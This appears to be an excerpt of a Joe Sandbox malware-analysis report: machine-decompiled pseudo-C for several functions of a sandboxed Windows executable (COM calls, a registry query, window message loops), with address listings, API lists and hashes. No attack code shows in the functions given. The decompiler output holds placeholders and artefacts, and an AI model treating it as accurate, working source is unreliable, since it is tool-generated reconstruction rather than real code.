                                                                                                                            			E004135F8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t59;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr* _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				intOrPtr* _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E0041E981(E00431AE6, __ebx, __edi, __esi);
				_t97 =  *((intOrPtr*)(_t101 + 8)) + 0xffffff28;
				E004070B9(_t101 - 0x18, _t103,  *((intOrPtr*)( *((intOrPtr*)(_t101 + 8)) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *((intOrPtr*)(_t101 - 0x14));
					if( *((intOrPtr*)(_t101 - 0x14)) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E00406890();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E0041EA59(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *((intOrPtr*)(_t101 + 0xc));
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *((intOrPtr*)(_t101 + 0xc))) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *((intOrPtr*)(_t97 + 0x50));
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *((intOrPtr*)(_t101 + 8)) = 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x43487c, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E0041EC90(_t97, _t101 - 0x48, 0, 0x20);
						E0041EC90(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *((intOrPtr*)(_t101 + 8));
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *((intOrPtr*)(_t101 + 0xc)), 0x437aec, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *((intOrPtr*)(_t101 - 0x44));
						_t82 = __imp__#6;
						 *((intOrPtr*)(_t101 + 0xc)) = _t70;
						if( *((intOrPtr*)(_t101 - 0x44)) != 0) {
							 *_t82( *((intOrPtr*)(_t101 - 0x44)));
						}
						__eflags =  *((intOrPtr*)(_t101 - 0x40));
						if( *((intOrPtr*)(_t101 - 0x40)) != 0) {
							 *_t82( *((intOrPtr*)(_t101 - 0x40)));
						}
						__eflags =  *((intOrPtr*)(_t101 - 0x3c));
						if( *((intOrPtr*)(_t101 - 0x3c)) != 0) {
							 *_t82( *((intOrPtr*)(_t101 - 0x3c)));
						}
						_t71 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *((intOrPtr*)(_t101 + 0xc));
						if( *((intOrPtr*)(_t101 + 0xc)) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E0040D8B0(_t85);
					goto L9;
				}
				 *((intOrPtr*)(_t101 - 0x68)) =  *((intOrPtr*)(_t101 + 0xc));
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E00411329(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *((intOrPtr*)(_t101 - 0x14)) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E00406890();
				}
				_t59 = _t98;
				goto L22;
			}
















                                                                                                                            0x004135f8
                                                                                                                            0x004135f8
                                                                                                                            0x004135ff
                                                                                                                            0x0041360d
                                                                                                                            0x00413616
                                                                                                                            0x00413623
                                                                                                                            0x00413626
                                                                                                                            0x0041374d
                                                                                                                            0x0041374d
                                                                                                                            0x00413751
                                                                                                                            0x00413754
                                                                                                                            0x00413756
                                                                                                                            0x00413759
                                                                                                                            0x0041375a
                                                                                                                            0x0041375a
                                                                                                                            0x0041375f
                                                                                                                            0x0041375f
                                                                                                                            0x00413761
                                                                                                                            0x00413766
                                                                                                                            0x00413766
                                                                                                                            0x00413632
                                                                                                                            0x0041367f
                                                                                                                            0x00413682
                                                                                                                            0x00413688
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041368e
                                                                                                                            0x00413695
                                                                                                                            0x0041369b
                                                                                                                            0x004136a0
                                                                                                                            0x004136a2
                                                                                                                            0x004136a5
                                                                                                                            0x004136aa
                                                                                                                            0x004136b1
                                                                                                                            0x004136bd
                                                                                                                            0x004136bf
                                                                                                                            0x004136c1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004136ce
                                                                                                                            0x004136da
                                                                                                                            0x004136df
                                                                                                                            0x004136e4
                                                                                                                            0x004136e7
                                                                                                                            0x004136e9
                                                                                                                            0x004136ee
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041370b
                                                                                                                            0x0041370e
                                                                                                                            0x00413711
                                                                                                                            0x00413717
                                                                                                                            0x0041371a
                                                                                                                            0x0041371f
                                                                                                                            0x0041371f
                                                                                                                            0x00413721
                                                                                                                            0x00413724
                                                                                                                            0x00413729
                                                                                                                            0x00413729
                                                                                                                            0x0041372b
                                                                                                                            0x0041372e
                                                                                                                            0x00413733
                                                                                                                            0x00413733
                                                                                                                            0x00413735
                                                                                                                            0x0041373b
                                                                                                                            0x0041373e
                                                                                                                            0x00413741
                                                                                                                            0x00413743
                                                                                                                            0x00413743
                                                                                                                            0x00000000
                                                                                                                            0x00413741
                                                                                                                            0x004136ac
                                                                                                                            0x004136ac
                                                                                                                            0x00000000
                                                                                                                            0x004136ac
                                                                                                                            0x00413637
                                                                                                                            0x00413640
                                                                                                                            0x00413647
                                                                                                                            0x0041364a
                                                                                                                            0x0041364d
                                                                                                                            0x00413650
                                                                                                                            0x00413653
                                                                                                                            0x00413656
                                                                                                                            0x00413659
                                                                                                                            0x00413661
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00413663
                                                                                                                            0x0041366a
                                                                                                                            0x0041366d
                                                                                                                            0x0041366f
                                                                                                                            0x00413672
                                                                                                                            0x00413673
                                                                                                                            0x00413673
                                                                                                                            0x00413678
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3574576181-0
                                                                                                                            • Opcode ID: 8509f3d06d22efd69c7219ecc6ea784f4bfff5074fc5c81354eee5bdc639412f
                                                                                                                            • Instruction ID: 9feac7abe9243d46c5e8c9eb735a24380447361cf50e6f739f89194a1b44a16e
                                                                                                                            • Opcode Fuzzy Hash: 8509f3d06d22efd69c7219ecc6ea784f4bfff5074fc5c81354eee5bdc639412f
                                                                                                                            • Instruction Fuzzy Hash: 6F417CB1D00218EFCF11DFA1C8859DEBB79BF04B11F10851BF015AA291C7389A91CF94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406184 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 65%
                                                                                                                            			E00406184(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				signed int _t39;
				char _t43;
				void* _t46;
				void* _t53;
				char* _t60;
				intOrPtr* _t73;
				intOrPtr* _t74;
				void* _t77;
				intOrPtr* _t78;
				void* _t94;
				intOrPtr* _t96;
				void* _t97;
				char* _t100;

				_t91 = __edx;
				_t78 = __ecx;
				_t76 = __ebx;
				_t100 =  &_v272;
				_t39 =  *0x441590; // 0x4917eadc
				_a264 = _t39 ^ _t100;
				_push(0x18);
				E0041E981(E004312EB, __ebx, __edi, __esi);
				_t96 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t43 = E00405F0F(__ecx, __edx);
				_v28 = _t43;
				if(_t43 != 0) {
					do {
						_t74 =  &_v28;
						_push(_t74);
						_t78 = _t96;
						E00405F20();
						if(_t74 != 0) {
							_t91 =  *_t74;
							_t78 = _t74;
							 *((intOrPtr*)( *_t74 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while (_v28 != 0);
				}
				if( *((intOrPtr*)(_t96 + 0x54)) == 0) {
					L12:
					 *[fs:0x0] = _v12;
					_pop(_t94);
					_pop(_t97);
					_pop(_t77);
					_t46 = E0041D773(1, _t77, _a264 ^ _t100, _t91, _t94, _t97);
					__eflags =  &_a268;
					return _t46;
				} else {
					if((0 |  *((intOrPtr*)(_t96 + 0x68)) != 0x00000000) != 0) {
						_push("Software\\");
						E00403615(_t76,  &_v16, 0, _t96, __eflags);
						_v4 = 0;
						E00406050( &_v16,  *((intOrPtr*)(_t96 + 0x54)));
						_push(0x433e28);
						_push( &_v16);
						_push( &_v36);
						_t53 = E00405FEC(_t76, 0, _t96, __eflags);
						_push( *((intOrPtr*)(_t96 + 0x68)));
						_v4 = 1;
						_push(_t53);
						_push( &_v24);
						E00405FEC(_t76, 0, _t96, __eflags);
						_v4 = 3;
						E00402C55(_v36 + 0xfffffff0, _t91);
						_push( &_v24);
						_push(0x80000001);
						E00406075(_t76, 0, 0x80000001, __eflags);
						_t60 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t60;
						if(_t60 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t100, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E00406075(_t76, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t100,  &_v32);
						E00402C55( &(_v24[0xfffffffffffffff0]), _t91);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E00402C55( &(_v16[0xfffffffffffffff0]), _t91);
						goto L12;
					} else {
						_push(_t100);
						_push(_t78);
						_v280 = 0x4408f8;
						E00420866( &_v280, 0x43b8fc);
						asm("int3");
						_t73 = _t78;
						 *((intOrPtr*)(_t73 + 4)) = 1;
						return _t73;
					}
				}
			}


























                                                                                                                            0x00406184
                                                                                                                            0x00406184
                                                                                                                            0x00406184
                                                                                                                            0x0040618b
                                                                                                                            0x0040618f
                                                                                                                            0x00406196
                                                                                                                            0x0040619c
                                                                                                                            0x004061a3
                                                                                                                            0x004061aa
                                                                                                                            0x004061ac
                                                                                                                            0x004061af
                                                                                                                            0x004061b2
                                                                                                                            0x004061b9
                                                                                                                            0x004061bc
                                                                                                                            0x004061be
                                                                                                                            0x004061be
                                                                                                                            0x004061c1
                                                                                                                            0x004061c2
                                                                                                                            0x004061c4
                                                                                                                            0x004061cb
                                                                                                                            0x004061cd
                                                                                                                            0x004061d4
                                                                                                                            0x004061d6
                                                                                                                            0x004061d6
                                                                                                                            0x004061d9
                                                                                                                            0x004061be
                                                                                                                            0x004061e1
                                                                                                                            0x004062be
                                                                                                                            0x004062c4
                                                                                                                            0x004062cc
                                                                                                                            0x004062cd
                                                                                                                            0x004062ce
                                                                                                                            0x004062d7
                                                                                                                            0x004062dc
                                                                                                                            0x004062e3
                                                                                                                            0x004061e7
                                                                                                                            0x004061f1
                                                                                                                            0x004061f8
                                                                                                                            0x00406200
                                                                                                                            0x0040620b
                                                                                                                            0x0040620e
                                                                                                                            0x00406213
                                                                                                                            0x0040621b
                                                                                                                            0x0040621f
                                                                                                                            0x00406220
                                                                                                                            0x00406225
                                                                                                                            0x00406228
                                                                                                                            0x0040622c
                                                                                                                            0x00406230
                                                                                                                            0x00406231
                                                                                                                            0x0040623f
                                                                                                                            0x00406243
                                                                                                                            0x0040624b
                                                                                                                            0x00406251
                                                                                                                            0x00406252
                                                                                                                            0x0040625f
                                                                                                                            0x00406265
                                                                                                                            0x00406267
                                                                                                                            0x0040627c
                                                                                                                            0x00406281
                                                                                                                            0x00406286
                                                                                                                            0x00406287
                                                                                                                            0x00406288
                                                                                                                            0x00406288
                                                                                                                            0x00406290
                                                                                                                            0x00406290
                                                                                                                            0x004062a2
                                                                                                                            0x004062ae
                                                                                                                            0x004062b6
                                                                                                                            0x004062b9
                                                                                                                            0x00000000
                                                                                                                            0x004061f3
                                                                                                                            0x0040d8b0
                                                                                                                            0x0040d8b3
                                                                                                                            0x0040d8bd
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8ca
                                                                                                                            0x0040d8cc
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040d8d3
                                                                                                                            0x004061f1

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 004061A3
                                                                                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0040625F
                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 00406276
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 00406290
                                                                                                                            • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 004062A2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                            • String ID: Software\
                                                                                                                            • API String ID: 3878845136-964853688
                                                                                                                            • Opcode ID: e57d5205d92cb7889bfff91a904d81ec044c737dcb17bdaf8271843150e4007d
                                                                                                                            • Instruction ID: 83f3990f3decbd1096b1e7d04995102ce4d2ca870395c93392ff60ae1b168149
                                                                                                                            • Opcode Fuzzy Hash: e57d5205d92cb7889bfff91a904d81ec044c737dcb17bdaf8271843150e4007d
                                                                                                                            • Instruction Fuzzy Hash: 3E419871900109ABCB11EFA5CC45AEFB7B8EF48304F10052FE512F22D1DB789A458B69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409D12 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 98%
                                                                                                                            			E00409D12(intOrPtr* __ecx, void* __edx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				int _t53;
				long _t56;
				signed int _t62;
				void* _t68;
				intOrPtr* _t70;
				void* _t71;

				_t68 = __edx;
				_t62 = 1;
				_t70 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E0040CE51(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t70 + 0x20));
				 *(_t70 + 0x3c) =  *(_t70 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E00405815(0);
				_t71 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t76 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E00405C3C(_t68, 0, _t70, _t76);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E0040CF1F(_t70, 1);
									UpdateWindow( *(_t70 + 0x20));
									_t62 = 0;
								}
							}
							_t48 =  *((intOrPtr*)( *_t70 + 0x80))();
							_t82 = _t48;
							if(_t48 == 0) {
								_t39 = _t70 + 0x3c;
								 *_t39 =  *(_t70 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t70 + 0x44));
							} else {
								if(E00405B56(_t62, 0, _t70, _t71, _t82, _v8) != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E004029AB();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						E0040CF1F(_t70, 1);
						UpdateWindow( *(_t70 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t70 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t70 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}





















                                                                                                                            0x00409d12
                                                                                                                            0x00409d1b
                                                                                                                            0x00409d23
                                                                                                                            0x00409d25
                                                                                                                            0x00409d29
                                                                                                                            0x00409d2d
                                                                                                                            0x00409d3b
                                                                                                                            0x00409d3b
                                                                                                                            0x00409d40
                                                                                                                            0x00409d46
                                                                                                                            0x00409d4a
                                                                                                                            0x00409d4e
                                                                                                                            0x00409d53
                                                                                                                            0x00409d59
                                                                                                                            0x00409dd1
                                                                                                                            0x00409dd1
                                                                                                                            0x00409dd1
                                                                                                                            0x00409dd5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409d6d
                                                                                                                            0x00409d6f
                                                                                                                            0x00409dd7
                                                                                                                            0x00409dd7
                                                                                                                            0x00409dd7
                                                                                                                            0x00409dde
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409de2
                                                                                                                            0x00409de8
                                                                                                                            0x00409df0
                                                                                                                            0x00409dfd
                                                                                                                            0x00409e05
                                                                                                                            0x00409e07
                                                                                                                            0x00409e07
                                                                                                                            0x00409df0
                                                                                                                            0x00409e0d
                                                                                                                            0x00409e13
                                                                                                                            0x00409e15
                                                                                                                            0x00409e50
                                                                                                                            0x00409e50
                                                                                                                            0x00409e50
                                                                                                                            0x00000000
                                                                                                                            0x00409e17
                                                                                                                            0x00409e23
                                                                                                                            0x00409e25
                                                                                                                            0x00409e2d
                                                                                                                            0x00409e2d
                                                                                                                            0x00409e41
                                                                                                                            0x00000000
                                                                                                                            0x00409e43
                                                                                                                            0x00000000
                                                                                                                            0x00409e43
                                                                                                                            0x00409e41
                                                                                                                            0x00409e15
                                                                                                                            0x00409e45
                                                                                                                            0x00409e46
                                                                                                                            0x00000000
                                                                                                                            0x00409e4b
                                                                                                                            0x00409d71
                                                                                                                            0x00409d73
                                                                                                                            0x00409d79
                                                                                                                            0x00409d81
                                                                                                                            0x00409d83
                                                                                                                            0x00409d83
                                                                                                                            0x00409d83
                                                                                                                            0x00409d85
                                                                                                                            0x00409d8a
                                                                                                                            0x00409d8c
                                                                                                                            0x00409d90
                                                                                                                            0x00409d92
                                                                                                                            0x00409d96
                                                                                                                            0x00409da5
                                                                                                                            0x00409da5
                                                                                                                            0x00409d96
                                                                                                                            0x00409d90
                                                                                                                            0x00409dab
                                                                                                                            0x00409db0
                                                                                                                            0x00409dcd
                                                                                                                            0x00409dcd
                                                                                                                            0x00000000
                                                                                                                            0x00409db2
                                                                                                                            0x00409dbf
                                                                                                                            0x00409dc5
                                                                                                                            0x00409dc9
                                                                                                                            0x00409dcb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409dcb
                                                                                                                            0x00409db0
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(?), ref: 00409D40
                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00409D67
                                                                                                                            • UpdateWindow.USER32(?), ref: 00409D81
                                                                                                                            • SendMessageA.USER32 ref: 00409DA5
                                                                                                                            • SendMessageA.USER32 ref: 00409DBF
                                                                                                                            • UpdateWindow.USER32(?), ref: 00409E05
                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00409E39
                                                                                                                              • Part of subcall function 0040CE51: GetWindowLongA.USER32 ref: 0040CE5C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2853195852-0
                                                                                                                            • Opcode ID: ddaf82bcba15cc0e5a5d3071de8e836581f3dfba35bfc18078b347f85548bee9
                                                                                                                            • Instruction ID: 0fd9eb9255d4b8381623f856c133738e987cd7b158a090441bb9693121ade207
                                                                                                                            • Opcode Fuzzy Hash: ddaf82bcba15cc0e5a5d3071de8e836581f3dfba35bfc18078b347f85548bee9
                                                                                                                            • Instruction Fuzzy Hash: 5B4191301047419BD7219F26C888B2BBAE5FFC0B09F04493EF481A12E2D77A9D45CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402564 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E00402564(long __ecx) {
				long _v4;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t16;
				long _t19;
				long _t20;
				struct HWND__* _t21;
				long _t22;
				struct HWND__* _t23;
				long _t24;
				struct HWND__* _t25;
				long _t29;
				void* _t30;
				void* _t33;
				long _t38;
				void* _t41;
				void* _t44;
				struct HWND__* _t45;
				struct HWND__* _t47;
				struct HWND__* _t48;
				long _t50;
				long _t52;

				_t36 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx + 0x78));
				if(_t16 == 0) {
					_t50 = E00402551();
					__eflags = _t50;
					if(_t50 != 0) {
						_t19 =  *((intOrPtr*)( *_t50 + 0x120))();
						__eflags = _t19;
						_t38 = _t50;
						_pop(_t51);
						if(_t19 != 0) {
							_t52 = _t38;
							_t20 =  *(_t52 + 0x64);
							__eflags = _t20;
							if(_t20 == 0) {
								_pop(_t51);
								goto L11;
							} else {
								__eflags = _t20 - 0x3f107;
								if(__eflags != 0) {
									_t30 = E0040706D(_t33, _t44, _t52, __eflags);
									_t20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t30 + 4)))) + 0xac))( *(_t52 + 0x64), 1);
								}
								return _t20;
							}
						} else {
							L11:
							_push(_t38);
							_push(_t33);
							_push(0);
							_push(_t51);
							_push(_t44);
							_v4 = _t38;
							_t21 = GetCapture();
							while(1) {
								_t45 = _t21;
								__eflags = _t45;
								if(_t45 == 0) {
									break;
								}
								_t22 = SendMessageA(_t45, 0x365, 0, 0);
								__eflags = _t22;
								if(__eflags != 0) {
									L26:
									return _t22;
								} else {
									_t21 = E0040B40C(0x365, _t41, _t45, __eflags, _t45);
									continue;
								}
								goto L32;
							}
							_t23 = GetFocus();
							while(1) {
								_t47 = _t23;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t22 = SendMessageA(_t47, 0x365, 0, 0);
								__eflags = _t22;
								if(__eflags != 0) {
									goto L26;
								} else {
									_t23 = E0040B40C(0x365, _t41, _t47, __eflags, _t47);
									continue;
								}
								goto L32;
							}
							_t36 = _v4;
							_t24 = E0040B451(_t36, _t47);
							__eflags = _t24;
							if(_t24 != 0) {
								_t25 = GetLastActivePopup( *(_t24 + 0x20));
								while(1) {
									_t48 = _t25;
									__eflags = _t48;
									_push(0);
									if(_t48 == 0) {
										break;
									}
									_t22 = SendMessageA(_t48, 0x365, 0, ??);
									__eflags = _t22;
									if(__eflags == 0) {
										_t25 = E0040B40C(0x365, _t41, _t48, __eflags, _t48);
										continue;
									}
									goto L26;
								}
								_t22 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L26;
							} else {
								goto L9;
							}
						}
					} else {
						L9:
						_push(0);
						_push(_t36);
						_v28 = 0x4408f8;
						E00420866( &_v28, 0x43b8fc);
						asm("int3");
						_t29 = _t36;
						 *((intOrPtr*)(_t29 + 4)) = 1;
						return _t29;
					}
				} else {
					if(_t16 != 0x3f107) {
						_push(1);
						_push(_t16);
						return  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xac))();
					}
					return _t16;
				}
				L32:
			}




























                                                                                                                            0x00402564
                                                                                                                            0x00402564
                                                                                                                            0x00402569
                                                                                                                            0x00402584
                                                                                                                            0x00402586
                                                                                                                            0x00402588
                                                                                                                            0x00402593
                                                                                                                            0x00402599
                                                                                                                            0x0040259b
                                                                                                                            0x0040259d
                                                                                                                            0x0040259e
                                                                                                                            0x0040df54
                                                                                                                            0x0040df56
                                                                                                                            0x0040df59
                                                                                                                            0x0040df5b
                                                                                                                            0x0040df7d
                                                                                                                            0x00000000
                                                                                                                            0x0040df5d
                                                                                                                            0x0040df5d
                                                                                                                            0x0040df62
                                                                                                                            0x0040df64
                                                                                                                            0x0040df75
                                                                                                                            0x0040df75
                                                                                                                            0x0040df7c
                                                                                                                            0x0040df7c
                                                                                                                            0x004025a0
                                                                                                                            0x0040deb5
                                                                                                                            0x0040deb5
                                                                                                                            0x0040deb6
                                                                                                                            0x0040deb7
                                                                                                                            0x0040deb8
                                                                                                                            0x0040deb9
                                                                                                                            0x0040deba
                                                                                                                            0x0040debe
                                                                                                                            0x0040dee3
                                                                                                                            0x0040dee3
                                                                                                                            0x0040dee5
                                                                                                                            0x0040dee7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ded7
                                                                                                                            0x0040ded9
                                                                                                                            0x0040dedb
                                                                                                                            0x0040df4d
                                                                                                                            0x0040df52
                                                                                                                            0x0040dedd
                                                                                                                            0x0040dede
                                                                                                                            0x00000000
                                                                                                                            0x0040dede
                                                                                                                            0x00000000
                                                                                                                            0x0040dedb
                                                                                                                            0x0040dee9
                                                                                                                            0x0040df01
                                                                                                                            0x0040df01
                                                                                                                            0x0040df03
                                                                                                                            0x0040df05
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040def5
                                                                                                                            0x0040def7
                                                                                                                            0x0040def9
                                                                                                                            0x00000000
